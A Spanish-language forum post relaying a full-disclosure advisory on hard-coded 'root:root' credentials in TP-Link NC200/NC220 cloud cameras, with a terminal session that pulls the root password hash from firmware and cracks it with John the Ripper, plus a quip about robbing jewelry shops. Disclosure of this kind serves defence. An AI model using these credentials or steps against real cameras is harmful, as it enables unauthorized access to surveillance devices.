El libre pensamiento para un internet libre
No estas registrado.
fuente del full disclosure :
TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials de LiquidWorm @ Packetstorm
LiquidWorm nos advierte sobre este gran falló en, por lo menos, dos modelos de cámaras vídeo estampillados TP-Link.
No hay mucho más por añadir tan la brecha es grosera: cualquier intruso o usuario sin derechos de administración puede hacerse con el control de una de estas cámaras.
La cuenta de administrador "root:root" esta siempre activada
Así que si tienes pensado atracar una joyería : Busca una con cámaras TP-Link
Podéis ver aquí en vivo como jhon the ripper encuentra los credenciales :
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
root_uImage
p2048_newroot.cer
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
Nproot:x:0:
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
root@zslab:~# john crack.me
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root (root)
guesses: 1 time: 0:00:00:00 DONE (Mon Aug 3 05:52:55 2015) c/s: 400 trying:
root - Userroot
Use the "--show" option to display all of the cracked passwords reliably
root@zslab:~# john crack.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh
1 password hash cracked, 0 left
root@zslab:~#
Saludos desde aquí a Gjoko 'LiquidWorm' Krstic que podéis seguir en su web
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
1 | 50 | Ayer 23:10:27 por wifiyeah | |
19 | 539 | Ayer 18:25:01 por elEstudiante | |
21 | 8769 | 01-02-2023 23:46:07 por kcdtv | |
0 | 175 | 26-01-2023 19:35:15 por kcdtv | |
Pegado: |
24 | 2266 | 26-01-2023 19:00:06 por Koala |
Ultimo usuario registrado: Facu_Hok
Usuarios registrados conectados: 0
Invitados conectados: 5
Número total de usuarios registrados: 2,422
Número total de temas: 1,629
Número total de mensajes: 15,499
Atom tema feed - Impulsado por FluxBB